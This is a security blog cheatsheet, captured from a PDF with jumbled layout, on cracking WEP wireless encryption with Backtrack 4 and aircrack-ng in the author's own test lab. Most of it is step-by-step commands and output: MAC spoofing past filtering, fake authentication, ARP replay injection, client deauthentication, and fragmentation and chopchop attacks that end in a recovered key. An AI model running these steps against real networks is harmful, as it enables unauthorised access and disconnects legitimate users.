3/20/2010

Cheatsheet : Cracking WEP with Backtrack…

Peter Van Eeckhoutte's Blog
:: [Knowledge is not an object, it´s a flow] :: Home Login/Register/Logout Your favorite posts Articles Free Tools AD & CS AD Disable Users Certificate List Utility PVE Find AD User Exchange Transport Agents Attachment filter Attachment rename Networking Cisco switch backup utility Network monitoring with powershell TCP Ping PVE POP3 Collector PVE POP3 Collector on the net Security Related Tools pvefindaddr Immunity Dbg PyCommand All downloads on this blog Public Files Forums Security Corelan Team Exploits Corelan Team Members Corelan Team Security Advisories Exploit writing – forum Exploit writing tutorials Metasploit Simple FTP Fuzzer – Metasploit Module Nessus/Openvas ike-scan wrapper pvefindaddr.py ImmDbg Plugin Vulnerability Disclosure Policy Shellcode to Javascript encoder Links Terms of use Donate
corelan.be:8800/…/cheatsheet‐cracking‐w… 1/14

aireplay-ng -3 -b <BSSID> wireless_int_in_monitor_mode) corelan. To be honest.3/20/2010 Cheatsheet : Cracking WEP with Backtrack… About me About me LinkedIn Resume Visitor Map About you Corelan public keys SSL « Juniper Screenos : Redundant multi-exitpoint ISP routing failover using multiple vrouters. The process of cracking the wep key for this scenario is Put wireless interface in monitor mode (airmon-ng start wireless_interface) Find wireless network (channel. Both adapters will work just fine. active client on network The AP in my testlab uses MAC filtering and is configured to use WEP.40 out of 5) You need to be a registered member to rate this post. MAC filtering enabled. and has a PCMCIA network card (Proxim. BSSID and ESSID) (airodump-ng wireless_interface_in_monitor_mode) Find a valid / connected client (MAC Address) Wait until client is gone and change mac address to valid client MAC (airmon-ng stop wireless_int. This page as PDF (Login first !) I know. OPEN Authentication. 2009 | Author: Peter Van Eeckhoutte Viewed 32. aireplay-ng –fakeauth 0 –a <BSSID> –h <local MAC> –e ESSID wireless_int_in_monitormode>.or cheatsheet. aircrack-ng and John The Ripper » You are here : Blog > 001_Security > Cheatsheet : Cracking WEP with Backtrack 4… Cheatsheet : Cracking WEP with Backtrack 4 and aircrack-ng February 20th. macchanger –m XX:XX:XX:XX:XX:XX wireless_int. the main reason I’m putting this info on this blog because I just wanted it as a quick reference. using OPEN Authentication Method. ifconfig wireless_int down. I have 2 clients that are currently connected to the wireless network. however I get better results with the proxim PCMCIA card because it has a range extender. So I guess this will be website zillion+1 learning how to audit your own WEP security. My auditor laptop (and old IBM T22) runs backtrack beta 4. in case I forget some about particular commands/parameters again :-) And why rely on other websites that may or may not be reachable when you need them :-) Scenario 1 : WEP encryption. there a probably already a zillion number of websites that show how to crack WEP. In this scenario. Atheros chipset) and a Dlink USB Wireless Adapter (DWL-G122).638 time(s) | Add this post to Your Favorite Posts | Print This Post | (5 votes.be:8800/…/cheatsheet‐cracking‐w… 2/14 . airmon-ng start wireless_int) Associate with AP and inject ARP packets (airodump-ng –c <channel> –-ivs –w /tmp/filename wireless_int_in_monitormode. ifconfig wireless_int up. multiple OSPF areas and eBGP Cheatsheet : Cracking WPA2 PSK with Backtrack 4. average: 4.

wlan0 is the Dlink USB adapter.1 Packets 12 441 Ok. so we have found a network with ESSID “TestNet”. This interface is the one we are going to use in order to find the wireless networks. WEP Lost 0 32 Rate 0. #/s 0 PWR 55 71 0 CH 11 MB ENC CIPHER AUTH ESSID WEP Probe TestNet TestNet TestNet BSSID 00:14:BF:89:9C:D3 BSSID 00:14:BF:89:9C:D3 00:14:BF:89:9C:D3 54 .ivs) In all cases. You’ll learn some techniques on how to do this in this blog. but set it to look at channel 11. Launch “airodump-ng ath1” to hop all channels and show the wireless networks that can be found. First.1 0. run airodump-ng again. For this test. and the clients (if any) that are currently associated with an Access Point : root@bt:~# airodump-ng ath1 CH 1 ][ Elapsed: 1 min ][ 2009-02-19 14:05 PWR 34 STATION 00:1C:BF:90:5B:A3 00:19:5B:52:AD:F7 Beacons 104 #Data. operating at channel 11. Apparently there are 2 clients connected to this AP. we’ll use the proxim card (wifi0).be:8800/…/cheatsheet‐cracking‐w… 3/14 . try to deauthenticate an existing client (aireplay-ng –deauth 0 -a BSSID –c CLientMAC wireless_int_in_monitor_mode) Save IV’s to file and crack the key (airocrack-ng –0 –b BSSID /tmp/filename. Let’s see if we can associate with Access Point with MAC (BSSID) 00:14:BF:89:9C:D3 First. in all scenario’s.[phy0] Atheros madwifi-ng VAP (parent: wifi0) The wifi0 adapter is the proxim pcmcia card. The mac address of this card is 00:20:A6:4F:A9:41 (you can get the mac address by running ‘ifconfig wifi0’) First. put the card in monitor mode : root@bt:~# airmon-ng start wifi0 Interface wifi0 wlan0 ath0 ath1 Chipset Driver Atheros madwifi-ng Ralink 2573 USB rt73usb . This is required for the AP association/authentication (via aireplay-ng) to operate at channel 11 as well (because you cannot specify the channel to use when running aireplay-ng) : root@bt:/# airodump-ng --channel 11 ath1 Leave the airodump-ng running for now and run the following aireplay-ng command to perform a ‘fake corelan. But let’s not jump ahead.[phy0] Atheros madwifi-ng VAP (parent: wifi0) Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) A new interface called “ath1” has been created. list the adapters : root@bt:~# airmon-ng Interface wifi0 wlan0 ath0 Chipset Driver Atheros madwifi-ng Ralink 2573 USB rt73usb .3/20/2010 Cheatsheet : Cracking WEP with Backtrack… If no ARP is found (and injected) in a reasonable amount of time. the most important component is verifying that you can associate with an AP.

3/20/2010 Cheatsheet : Cracking WEP with Backtrack… authentication’ attempt : root@bt:~# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1 No source MAC (-h) specified. kill the airodump-ng process. Inc. bring wifi0 up again and then put the interface back in monitor mode : root@bt:~# ifconfig wifi0 down root@bt:~# macchanger -m 00:1C:BF:90:5B:A3 wifi0 Current MAC: 00:20:a6:4f:a9:44 (Proxim.[phy0] Atheros madwifi-ng VAP (parent: wifi0) Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) root@bt:~# ifconfig ath1 ath1 Link encap:UNSPEC HWaddr 00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:106 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:9448 (9. so the AP does MAC filtering. change the mac address of wifi0. but we’ll change the MAC address on our interface (which will make all future commands shorter) First. We could try to use the MAC address of one of the clients that are already connected (by specifying its MAC address using the –h parameter).0 B) Ok.[phy0] Atheros madwifi-ng VAP (parent: wifi0) Bring wifi0 down.) Faked MAC: 00:1c:bf:90:5b:a3 (unknown) root@bt:~# ifconfig wifi0 up root@bt:~# airmon-ng start wifi0 Interface wifi0 wlan0 ath0 ath1 Chipset Driver Atheros madwifi-ng Ralink 2573 USB rt73usb .be:8800/…/cheatsheet‐cracking‐w… 4/14 .4 KB) TX bytes:0 (0. looks good corelan. Take wifi0 (ath1) out of monitoring mode : root@bt:~# airmon-ng stop ath1 Interface wifi0 wlan0 ath0 ath1 Chipset Driver Atheros madwifi-ng Ralink 2573 USB rt73usb . Using the device MAC (00:20:A6:4F:A9:41) 14:14:50 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 14:14:50 Sending Authentication Request (Open System) [ACK] 14:14:50 AP rejects the source MAC address (00:20:A6:4F:A9:41) ? Authentication failed (code 1) 14:14:53 Sending Authentication Request (Open System) [ACK] 14:14:53 AP rejects the source MAC address (00:20:A6:4F:A9:41) ? Authentication failed (code 1) Ok – Authentication failed.[phy0] Atheros madwifi-ng VAP (parent: wifi0) Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) root@bt:~# airmon-ng Interface wifi0 wlan0 ath0 Chipset Driver Atheros madwifi-ng Ralink 2573 USB rt73usb .

Some AP’s require you to be associated (or will perform disassociate after a while). you should be able to associate with the AP. now let’s try to crack the key. launch aireplay-ng in injection mode : root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1 For information.cap You should also start airodump-ng to capture replies. If you don’t have a lot of time. If not. Using the device MAC (00:1C:BF:90:5B:A3) 14:20:19 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 14:20:19 14:20:19 14:20:19 14:20:19 Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1) If you are connecting to an AP that is a bit picky. #/s 0 Rate 0. sent 0 packets. there’s no use in continuing with the process. thus increasing the number of data packets (and iv’s) on the network). Using the device MAC (00:1C:BF:90:5B:A3) 14:26:55 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 Saving ARP requests in replay_arp-0219-142655. The tool will then automatically attempt to inject the ARP packets. WEP Packets 84 The number of #Data packets is most likely still very low and does not go up as fast as we want it to. Run airodump-ng again (airodump-ng –c 11 ath1) and then try to perform the fake authentication again root@bt:/# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1 No source MAC (-h) specified. First. Ok. Read 243 packets (got 0 ARP requests and 0 ACKs).(0 pps) (leave this running – wait until an ARP request is seen. First. it might help trying to associate yourself again : aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1 corelan.be:8800/…/cheatsheet‐cracking‐w… 5/14 .1 0 CH 11 Lost 10 MB ENC CIPHER AUTH ESSID WEP Probe TestNet OPN TestNet 54 .. stop the existing airodump process and run airodump-ng with the option to save the iv’s to a file (parameter –i or –ivs): root@bt:~# airodump-ng -c 11 -w /tmp/TestNetAudit1 -i ath1 CH 11 ][ Elapsed: 12 s ][ 2009-02-19 14:24 BSSID 00:14:BF:89:9C:D3 BSSID 00:14:BF:89:9C:D3 PWR RXQ 34 100 STATION 00:19:5B:52:AD:F7 Beacons 135 PWR 43 #Data. it works better without this last parameter) From this point forward. So we need to grab an ARP packet and inject it.. It might take a couple of minutes before an ARP is seen. then you have some options to tweak the aireplay-ng behaviour : aireplay-ng -1 6000 -o 1 -q 12 -e TestNet -a 00:14:BF:89:9C:D3 ath1 –1 6000 = reauthenticate every 6000 seconds -o 1 = only send one set of packets at a time -q 12= send keepalive packets every 12 seconds (sometimes. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified.3/20/2010 Cheatsheet : Cracking WEP with Backtrack… Let’s see if it makes a difference.

and the number of packets keeps growing.BSSID: [00:14:BF:89:9C:D3] 14:38:19 Sending DeAuth to broadcast -. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified. When the client connects again (in most cases. then try to deauthenticate the existing clients. signal is strong.. Using the device MAC (00:1C:BF:90:5B:A3) 14:39:08 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 Saving ARP requests in replay_arp-0219-143908.be:8800/…/cheatsheet‐cracking‐w… 6/14 . you can set your own MAC address to one of the clients and try to deauth the other client…) Keep the aireplay-ng and airodump-ng running and run the deauth attack. you should see that the ARP injection process starts to work : root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1 For information.BSSID: [00:14:BF:89:9C:D3] 14:38:17 Sending DeAuth to broadcast -. and the injection works well. the valid client will be disconnected.0 rc2 r1415 [00:00:01] Tested 865 keys (got 140507 IVs) corelan. So if your coverage is good. it may go very fast. which should set off the ARP injection. please wait. If you have a second client MAC address.1 54.BSSID: [00:14:BF:89:9C:D3] 14:38:19 Sending DeAuth to broadcast -. root@bt:/# aireplay-ng --deauth 0 -a 00:14:BF:89:9C:D3 ath1 14:38:15 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>).. you’ll probably need between 80000 and 250000 data packets.ivs Opening /tmp/TestNetAudit1-01. sent 7116 packets.1 Lost 46 0 For a 128bit WEP key. and after max.BSSID: [00:14:BF:89:9C:D3] 14:38:16 Sending DeAuth to broadcast -.BSSID: [00:14:BF:89:9C:D3] If this works. Redd 7951 packets (got 878 ARP requests and 589 ACKs).. this happens automatically). By the time I wrote the last 2 lines of text.. (which may not work very well if the AP has MAC filtering enabled. I had already captured 140000 IVs. root@bt:/# aircrack-ng –0 -b 00:14:BF:89:9C:D3 /tmp/TestNetAudit1-01.ivs Reading packets. #/s 41799 PWR 71 34 814 CH 11 MB ENC CIPHER AUTH ESSID WEP Probe TestNet TestNet OPN TestNet 54 . which appears to be sufficient to crack the key in one shot.BSSID: [00:14:BF:89:9C:D3] 14:38:18 Sending DeAuth to broadcast -.(499 pps) At the same time.3/20/2010 Cheatsheet : Cracking WEP with Backtrack… If that does not generate the required ARP packet(s).cap You should also start airodump-ng to capture replies. you should start to see the number of data packets increasing rapidly : CH 11 ][ Elapsed: 7 mins ][ 2009-02-19 14:32 ] BSSID 00:14:BF:89:9C:D3 BSSID 00:14:BF:89:9C:D3 00:14:BF:89:9C:D3 PWR RXQ 34 97 Beacons 4582 #Data.BSSID: [00:14:BF:89:9C:D3] 14:38:17 Sending DeAuth to broadcast -. Aircrack-ng 1. You can already try to break the key using the ivs file that is being generated. the crack process will automatically reread the file and attempt to crack the key. However you don’t need to wait until you’ve gathered all those packets. a couple of minutes. WEP Packets 2495 51017 STATION 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 Rate 0. As long as the key is not found. 14:38:15 Sending DeAuth to broadcast -.

WEP1xx = 256bit) Scenario 2 : WEP encryption. then this is what you can do if there are no active clients connected to the network at the time of the audit : Put wireless interface in monitor mode (airmon-ng start wireless_interface) Find wireless network (BSSID and ESSID) (airodump-ng wireless_interface_in_monitor_mode) Associate with AP (airodump-ng –c <channel> –-ivs –w /tmp/filename wireless_int_in_monitormode. perhaps deauthenticate an existing client and it should continue to grow. start it again. If the packets all of a sudden stop increasing. In my case. re-associate. capturing ivs to a file. packetforge-ng…) Inject custom ARP packet (aireplay-ng –2 –r custom_arp_packet. if MAC filtering is enabled and there are no active clients. first of all. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified.be:8800/…/cheatsheet‐cracking‐w… 7/14 . then stop the injection process. The key is 26 characters. :-) So assuming that there is no MAC filtering. but a whole lot more useless as well. so if we assume that the key is in hex. I’ll assume that you are able to associate yourself with the AP (either using any MAC or using a valid MAC from the MAC filter list) and that you have your airodump-ng running. no active clients Ok. or by bruteforcing mac addresses :) ). Let’s try the fragmentation attack first (option –5) root@bt:~# aireplay-ng -5 -b 00:14:BF:89:9C:D3 ath1 For information. MAC filtering enabled (?). WEP104 = 128bit..aireplay-ng –4 –b <BSSID> –h <Local MAC> wireless_int_in_monitor_mode. corelan. or you have managed to get a valid MAC address of a client (earlier.3/20/2010 KB 0 1 2 3 4 depth 0/ 1 0/ 9 0/ 1 7/ 3 13/ 4 byte(vote) A3(203120) EA(193816) D3(212716) AA(153630) DD(150086) 73(160718) 22(150440) AD(197696) 1F(122064) 23(139760) Cheatsheet : Cracking WEP with Backtrack… 31(256416) AD(254880) 22(135904) B0(141808) 05(129534) 18(156160) 0D(153856) E6(153601) BB(151552) E4(149504) DD(154112) 9B(153856) 4A(153334) 3C(151040) 04(149248) FE(153344) 4B(153600) 89(151208) F8(150724) 70(149238) KEY FOUND! [ A3:EA:D3:AA:DD:73:22:AD:1F:23:31:AD:22 ] Decrypted correctly: 100% If you would not have had enough IVs. The total process took about 10 minutes. the key was cracked in 1 second. we are dealing with 128bit WEP.file wireless_int_in_monitor_mode) Save IVs to file. I guess it makes the wireless network a bit safer. Using the device MAC (00:1C:BF:90:5B:A3) 18:29:43 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 18:29:43 Waiting for a data packet. crack the key. OPEN Authentication. the aircrack-ng process would just sit and wait until the file has grown bigger and would then attempt to crack the key again.. This mode is also called WEP104 (In case you forgot : WEP40 = 64bit. it’s going to be difficult to get a valid MAC address that is allowed to associate with the AP. throw a party The first 3 steps are similar to scenario 1. aireplay-ng –fakeauth 0 –a <BSSID> –h <local MAC> –e ESSID wireless_int_in_monitormode>) Use fragmentation or chopchop attack and generate a valid custom arp packet (aireplay-ng –5 –b <BSSID> wireless_int_in_monitormode.

then use this fake mac in the commandk) root@bt:~# packetforge-ng -0 -a 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 -k 255.eH.255...CUT --Use this packet ? y 0000 bf89 962e e370 5d7e d7de a197 525f 6b7a 122a 4811 4e38 62a6 Saving chosen packet in replay_src-0219-184930.. now the arp packet is ready..A..#L}....255 -y fragment-0219-185011.)...Z ".... ..b..... $.255 -l 255. 0x0000: 0862 0x0010: 0014 0x0020: 49b8 0x0030: 9e06 0x0040: 24e1 0x0050: fd83 0x0070: d00e 0x0080: edab 0x0090: b0c3 0x00a0: 638d 0x00b0: f465 0x00c0: 22df 0x00d0: 492d --.255.. MAC Source MAC = = = 00:14:BF:89:9C:D3 01:00:5E:7F:FF:FA 00:14:BF:89:9C:D1 0100 9cd1 631e 1feb 5399 7cf8 2ca3 8cf1 011e e307 b31c bb98 52bc 5e7f 9032 f086 eb0e 2fea 09df 6446 9645 3ced 9e62 3d5e 6136 2ef7 fffa f342 80e5 c38b 234c 85ba 60e6 dadf 00d5 4ed7 0129 2177 41f0 0014 c600 4337 76d6 7d1b b692 0fc7 cbce 2ed3 3475 dc79 7062 18b1 bf89 ec3e dd4f 9ad7 668c 8a62 ab67 c12f 696c 2679 07c0 8dea e12d 9cd3 bc5d 37a4 8118 23b5 a5bd 64d6 439d 4aae 6168 805a 8a4a 409d .xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream You should get “Got RELAYED packet!!” in order to be successfull.<. .a6!wpb.... FromDS: 1. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified.C7.. dest mac.^​.] I..R..]~S....... Let’s inject it into the network root@bt:~# aireplay-ng -2 -r /tmp/my-arp-request ath1 For information. .#......kz. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified...f.. Review the packet (BSSID..E... ..N8.R_.xor file to generate and ARP packet that can be injected and will help to get IVs.>.... Size: 352.=^.cap 18:50:11 Data packet found! 18:50:11 Sending fragmented packet 18:50:11 Got RELAYED packet!! 18:50:11 Trying to get 384 bytes of a keystream 18:50:11 Got RELAYED packet!! 18:50:11 Trying to get 1500 bytes of a keystream 18:50:12 Got RELAYED packet!! Saving keystream in fragment-0219-185011..3/20/2010 Cheatsheet : Cracking WEP with Backtrack… Wait until you are asked whether you want to use a packet that was captured.y.b.. Ok..|....255.255. In this command.. now you can use the .....v.....B.. If you are using a fake MAC.. source mac) and make sure the packet comes from the Access Point. Using the device MAC (00:1C:BF:90:5B:A3) corelan./C. Sometimes you will need to try a couple of times before the system will respond correctly root@bt:~# aireplay-ng -5 -b 00:14:BF:89:9C:D3 ath1 For information..p.gd.../..be:8800/…/cheatsheet‐cracking‐w… 8/14 . .ilJ...bN.2.-@....xor -w /tmp/my-arp-request Wrote packet to: /tmp/my-arp-request (I’ve put the command on 3 lines to improve readability – just make sure to put everything in one line) Ok........J I-b. Using the device MAC (00:1C:BF:90:5B:A3) 18:48:14 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 18:48:14 Waiting for a data packet.dF`.*...4u&yah . you will have to specify the local MAC address (so make sure to use the correct MAC address.O7. .. c.. ToDS: 0 (WEP) BSSID Dest.c. Read 3076 packets... .

. current guess: F0. FromDS: 1..SNg \.qwY........ (switch to the airodump-ng output) In most cases...Yi..try running another aireplay-ng with attack "-1" (fake open-system authentication). .Ox@ .CUT --Use this packet ? y 0000 bf89 8958 95b8 a065 1e42 f49b 627c d8b3 073c 3787 f2dd bad9 Saving chosen packet in replay_src-0219-190538.!.~?..be:8800/…/cheatsheet‐cracking‐w… 9/14 .. ... if you get this message.... this attack works well... ....7.....q..... if you have not been able to successfully get a .e. session 1 : start the fakeauth root@bt:~# aireplay-ng --fakeauth 6000 -o 1 -a 00:14:BF:89:9C:D3 -e TestNet ath1 No source MAC (-h) specified..Av] L.. try running a aireplay-ng –fakeauth while running the chopchop attack..X..J....{:.... Size: 352....x. FromDS: 0... . Using the device MAC (00:1C:BF:90:5B:A3) 19:08:49 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 19:08:49 19:08:49 19:08:49 Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] corelan.T.A... MAC Source MAC = = = 00:14:BF:89:9C:D3 01:00:5E:7F:FF:FA 00:14:BF:89:9C:D1 0100 9cd1 fedb 2d56 99bb 5630 ca99 838e 0300 bcb3 b4cb 14ac 7a1d 5e7f 201a 0f68 8a21 907b b0e6 b107 f247 0da4 f8ed 8994 ccfe 2a60 fffa 2639 330c 0af2 3a84 0171 2d1d b581 90b1 a240 4a94 bca0 4a80 0014 c800 78f9 8b1e 8cd0 0fcb ab9c 771d a0b2 08c2 5969 d769 54bc bf89 8354 944f 0953 d159 3ad7 039f 7e3f 046c d706 b741 aa37 418d 9cd3 3936 7840 4e67 e4ce 57ab ad7c bc3c 6920 adf3 765d cbc1 df57 ..^​.i......cap Sent 241 packets.... .BV0...Y.w.uGK. MAC Source MAC 0x0000: 0x0010: 0x0020: 0x0040: Use this packet ? = = = 00:14:BF:89:9C:D3 FF:FF:FF:FF:FF:FF 00:1C:BF:90:5B:A3 Cheatsheet : Cracking WEP with Backtrack… 0841 ffff 8ffc 5c4c 0201 0014 bf89 9cd3 001c bf90 5ba3 ffff ffff 8001 0043 c600 1c3b d684 a071 7759 1075 474b caae b7a6 5ad2 2447 ..A.. ....<.&9.....xor file using this procedure. .....)b|.7.@. you can use the chopchop attack as well : root@bt:~# aireplay-ng -4 -b 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 ath1 For information....[....W 0x0000: 0862 0x0010: 0014 0x0020: d88c 0x0030: 1871 0x0040: 5c10 0x0050: 83da 0x0060: 0e5f 0x0070: 0729 0x0080: 4068 0x00a0: 11fc 0x00b0: 9ac9 0x00c0: 4cd5 0x00d0: 9577 --..h3...b. no action required: Using gettimeofday() instead of /dev/rtc 19:04:26 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 Read 2938 packets. ToDS: 0 (WEP) BSSID Dest.T96 ...< @h.W.. However......| .:....-V... ....... ..*`J.w.._..z......-..Z....q.li . ToDS: 1 (WEP) BSSID Dest..G.3/20/2010 Size: 68...C.... \L$G Enter “y” and see if the data packets are now increasing.... Failure: got several deauthentication packets from the AP .

G^[..v....lj.xor file..cap corelan.+B... no action required: Using gettimeofday() instead of /dev/rtc 19:08:55 Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11 Read 1841 packets.IF`+.s.....".... ...t ... R .....3/20/2010 19:08:49 19:09:04 19:09:04 19:09:07 19:09:07 19:09:07 19:09:07 19:09:22 19:09:22 19:09:25 19:09:25 19:09:25 19:09:25 19:09:40 19:09:40 19:09:43 19:09:43 19:09:43 19:09:43 19:09:45 19:09:48 19:09:48 19:09:48 19:09:48 19:10:03 19:10:18 19:10:33 19:10:48 19:11:03 Cheatsheet : Cracking WEP with Backtrack… Association successful :-) (AID: 1) Sending keep-alive packet [ACK] Got a deauthentication packet! (Waiting 3 seconds) Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1) Sending keep-alive packet [ACK] Got a deauthentication packet! (Waiting 3 seconds) Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1) Sending keep-alive packet [ACK] Got a deauthentication packet! (Waiting 3 seconds) Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1) Got a deauthentication packet! (Waiting 3 seconds) Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID: 1) Sending keep-alive packet [ACK] Sending keep-alive packet [ACK] Sending keep-alive packet [ACK] Sending keep-alive packet [ACK] Sending keep-alive packet [ACK] session 2 : run chopchop while fakeauth is running Enter “y” to select a packet.S. This process can take multiple minutes..\....K..​.R^. FromDS: 1. Don’t worry..^​.j.l.b.CUT --Use this packet ? y 0000 bf89 525e 2a16 a52b ddec 2b42 6c5f 190a 02e3 Saving chosen packet in replay_src-0219-190940...NS=...|u.. ..@. as long as it keeps running.^ . Wait until the process has reached 100% and you should have your ....Q7... Size: 352.. you’re fine.l_...hN.igQ.. MAC Source MAC = = = 00:14:BF:89:9C:D3 01:00:5E:7F:FF:FA 00:14:BF:89:9C:D1 0100 9cd1 b994 684e f305 5316 e618 9c95 4e53 fe9f 5e7f 4003 7f52 da3b a77c 8065 6ab1 f185 3d1b 6c6a fffa 3c39 f494 2296 bae0 bb06 475e 6967 e4cd 9776 0014 c800 6cd9 c849 8013 14ec 5bdd 51ca bc51 eff1 bf89 a4b4 2e85 4660 1887 a7a6 73c9 180d 37d8 7c75 9cd3 4b96 9a96 2b06 5cd9 005e ff74 b844 feaf fb10 .......... 0x0000: 0862 0x0010: 0014 0x0020: 94d4 0x0030: fd15 0x0050: 029d 0x0060: 26ee 0x0070: c6b5 0x0080: d312 0x0090: bb62 0x00a0: 9579 --.|. .. ToDS: 0 (WEP) BSSID Dest..+.... root@bt:~# aireplay-ng -4 -b 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 ath1 For information. &.b.e.y..*. .<9..be:8800/…/cheatsheet‐cracking‐w… 10/14 ..D .. ........

255. root@bt:~# packetforge-ng -0 -a 00:14:BF:89:9C:D3 -h 00:1C:BF:90:5B:A3 -k 255.3/20/2010 Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset 351 350 349 348 347 346 345 344 343 342 341 340 339 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 ( ( ( ( ( ( ( ( ( ( ( ( ( 0% 0% 0% 0% 1% 1% 1% 2% 2% 2% 3% 3% 3% done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) done) | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor xor = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 4C A0 0D D7 C7 92 1C 62 18 18 22 D4 31 25 CF 5A 2B C1 25 B1 87 17 2C BD 3D 87 6C 94 2F D9 6C 94 F8 6A 7E 94 FC 5E 5A | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt pt = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = 88 F0 6E C3 0A 0D 0A 0D 65 63 69 76 65 6C 07 CC 09 FA FF FF EF 01 06 A8 C0 11 F6 11 01 00 00 00 0C 38 01 00 45 00 08 Cheatsheet : Cracking WEP with Backtrack… | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | 637 26 123 174 36 236 139 77 226 133 133 205 72 108 46 20 164 10 257 133 61 175 205 241 179 36 180 199 236 103 87 98 20 113 231 236 20 231 148 frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames frames written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written written in 12991ms in 530ms in 2502ms in 3555ms in 734ms in 4800ms in 2820ms in 1576ms in 4587ms in 2718ms in 2722ms in 4171ms in 1465ms in in in in in in in in in in in in in in in in in in in in in in in in in in 2196ms 938ms 420ms 3346ms 204ms 5224ms 2722ms 1245ms 3563ms 4171ms 4909ms 3653ms 735ms 3657ms 4073ms 4812ms 2085ms 1783ms 1975ms 420ms 2306ms 4698ms 4799ms 420ms 4701ms 3032ms (91% (92% (92% (92% (93% (93% (93% (94% (94% (94% (94% (95% (95% (95% (96% (96% (96% (97% (97% (97% (98% (98% (98% (99% (99% (99% Saving plaintext in replay_dec-0219-192452. MAC = = 00:14:BF:89:9C:D3 FF:FF:FF:FF:FF:FF corelan.cap Saving keystream in replay_dec-0219-192452.255 -y replay_dec-0219-192452.255. Using the device MAC (00:1C:BF:90:5B:A3) Size: 68.xor file using the fragmentation attack : create an arp packet (packetforge-ng). capture the IVs and crack the key.255.be:8800/…/cheatsheet‐cracking‐w… 11/14 . ToDS: 1 (WEP) BSSID Dest.xor Completed in 907s (0. FromDS: 0.35 bytes/s) Follow the same steps that were used when we created a .255 -l 255.255. no action required: Using gettimeofday() instead of /dev/rtc No source MAC (-h) specified.xor -w /tmp/my-2nd-arp-request Wrote packet to: /tmp/my-2nd-arp-request Inject : root@bt:~# aireplay-ng -2 -r /tmp/my-2nd-arp-request ath1 For information. inject the packet (aireplay-ng).

